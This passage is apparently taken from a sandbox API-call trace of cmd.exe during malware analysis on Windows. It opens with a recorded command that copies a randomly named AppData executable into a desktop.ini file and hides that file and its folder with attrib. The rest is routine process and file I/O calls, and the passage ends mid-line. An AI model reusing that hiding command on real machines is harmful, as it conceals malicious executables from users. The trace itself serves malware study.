\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"" [0227.123] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.123] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1c38, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0227.123] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0227.123] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0227.123] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.123] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0227.123] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0227.123] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0227.123] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0227.123] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0227.123] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0227.124] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0227.124] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0227.124] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0227.124] GetEnvironmentStringsW () returned 0x2e2628* [0227.124] FreeEnvironmentStringsW (penv=0x2e2628) returned 1 [0227.124] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.124] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.124] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0227.124] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0227.124] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0227.124] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0227.124] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0227.124] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0227.124] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0227.124] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0227.124] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f680 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.124] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f680, lpFilePart=0x26f67c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f67c*="Desktop") returned 0x18 [0227.124] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.124] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f3fc | out: lpFindFileData=0x26f3fc) returned 0x2e0cb8 [0227.125] FindClose (in: hFindFile=0x2e0cb8 | out: hFindFile=0x2e0cb8) returned 1 [0227.125] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f3fc | out: lpFindFileData=0x26f3fc) returned 0x2e0cb8 [0227.125] FindClose (in: hFindFile=0x2e0cb8 | out: hFindFile=0x2e0cb8) returned 1 [0227.125] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f3fc | out: lpFindFileData=0x26f3fc) returned 0x2e0cb8 [0227.125] FindClose (in: hFindFile=0x2e0cb8 | out: hFindFile=0x2e0cb8) returned 1 [0227.125] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.125] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0227.125] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0227.125] GetEnvironmentStringsW () returned 0x2e04d8* [0227.125] FreeEnvironmentStringsW (penv=0x2e04d8) returned 1 [0227.125] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.126] GetConsoleOutputCP () returned 0x1b5 [0227.126] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.126] GetUserDefaultLCID () returned 0x409 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a4f4950, cchData=8 | out: lpLCData=":") returned 2 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f7c0, cchData=128 | out: lpLCData="0") returned 2 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f7c0, cchData=128 | out: lpLCData="0") returned 2 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f7c0, cchData=128 | out: lpLCData="1") returned 2 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a4f4940, cchData=8 | out: lpLCData="/") returned 2 [0227.126] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a4f4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a4f4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a4f4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a4f4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a4f4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a4f4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a4f4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a4f4930, cchData=8 | out: lpLCData=".") returned 2 [0227.127] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a4f4920, cchData=8 | out: lpLCData=",") returned 2 [0227.127] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0227.128] GetConsoleTitleW (in: lpConsoleTitle=0x2d0af0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.128] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.128] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0227.128] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0227.128] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0227.129] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0227.129] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0227.129] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0227.129] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0227.129] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0227.129] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0227.129] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0227.131] _wcsicmp (_String1="del", _String2=")") returned 59 [0227.131] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0227.131] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0227.131] _wcsicmp (_String1="IF", _String2="del") returned 5 [0227.131] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0227.131] _wcsicmp (_String1="REM", _String2="del") returned 14 [0227.131] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0227.133] _wcsicmp (_String1="type", _String2=")") returned 75 [0227.133] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0227.133] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0227.133] _wcsicmp (_String1="IF", _String2="type") returned -11 [0227.133] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0227.133] _wcsicmp (_String1="REM", _String2="type") returned -2 [0227.133] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0227.264] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0227.264] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0227.277] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0227.278] FindClose (in: hFindFile=0x2e25c8 | out: hFindFile=0x2e25c8) returned 1 [0227.279] FindClose (in: hFindFile=0x2e25c8 | out: hFindFile=0x2e25c8) returned 1 [0227.279] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0227.279] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0227.279] GetConsoleTitleW (in: lpConsoleTitle=0x26f1e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.279] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f070, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f138 | out: lpAttributeList=0x26f070, lpSize=0x26f138) returned 1 [0227.279] UpdateProcThreadAttribute (in: lpAttributeList=0x26f070, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f130, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f070, lpPreviousValue=0x0) returned 1 [0227.279] GetStartupInfoW (in: lpStartupInfo=0x26f02c | out: lpStartupInfo=0x26f02c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0227.279] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0227.280] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f0cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f118 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" ", lpProcessInformation=0x26f118*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf28, dwThreadId=0xf4c)) returned 1 [0227.284] CloseHandle (hObject=0x4c) returned 1 [0227.284] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0227.284] GetEnvironmentStringsW () returned 0x2e0a08* [0227.284] FreeEnvironmentStringsW (penv=0x2e0a08) returned 1 [0227.284] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0227.659] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f00c | out: lpExitCode=0x26f00c*=0x0) returned 1 [0227.659] CloseHandle (hObject=0x50) returned 1 [0227.659] _vsnwprintf (in: _Buffer=0x26f154, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f018 | out: _Buffer="00000000") returned 8 [0227.660] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0227.660] GetEnvironmentStringsW () returned 0x2e2618* [0227.660] FreeEnvironmentStringsW (penv=0x2e2618) returned 1 [0227.660] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0227.660] GetEnvironmentStringsW () returned 0x2e2618* [0227.660] FreeEnvironmentStringsW (penv=0x2e2618) returned 1 [0227.660] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f070 | out: lpAttributeList=0x26f070) [0227.660] GetConsoleTitleW (in: lpConsoleTitle=0x26f3f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.661] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\desktop.ini")) returned 0xffffffff [0227.661] GetLastError () returned 0x2 [0227.661] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00")) returned 0x10 [0227.661] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0227.661] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0227.661] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\desktop.ini")) returned 0xffffffff [0227.661] GetLastError () returned 0x2 [0227.661] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x26ee9c | out: lpConsoleScreenBufferInfo=0x26ee9c) returned 1 [0227.662] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a504640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0227.663] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0227.663] GetConsoleTitleW (in: lpConsoleTitle=0x26f38c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.664] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0227.664] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.665] GetFileType (hFile=0x50) returned 0x1 [0227.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.665] GetFileType (hFile=0x50) returned 0x1 [0227.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.665] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] GetFileType (hFile=0x50) returned 0x1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] GetFileType (hFile=0x50) returned 0x1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] GetFileType (hFile=0x50) returned 0x1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] GetFileType (hFile=0x50) returned 0x1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] GetFileType (hFile=0x50) returned 0x1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.667] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.668] GetFileType (hFile=0x50) returned 0x1 [0227.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.668] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.668] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.668] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.668] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.668] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.668] GetFileType (hFile=0x50) returned 0x1 [0227.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.668] GetFileType (hFile=0x50) returned 0x1 [0227.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.668] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.668] GetFileType (hFile=0x50) returned 0x1 [0227.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] GetFileType (hFile=0x50) returned 0x1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] GetFileType (hFile=0x50) returned 0x1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] GetFileType (hFile=0x50) returned 0x1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] GetFileType (hFile=0x50) returned 0x1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.669] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.669] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.670] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.670] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] GetFileType (hFile=0x50) returned 0x1 [0227.670] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.670] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] GetFileType (hFile=0x50) returned 0x1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] GetFileType (hFile=0x50) returned 0x1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] GetFileType (hFile=0x50) returned 0x1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.671] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.671] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] GetFileType (hFile=0x50) returned 0x1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] GetFileType (hFile=0x50) returned 0x1 [0227.671] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.671] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] GetFileType (hFile=0x50) returned 0x1 [0227.672] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.672] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, 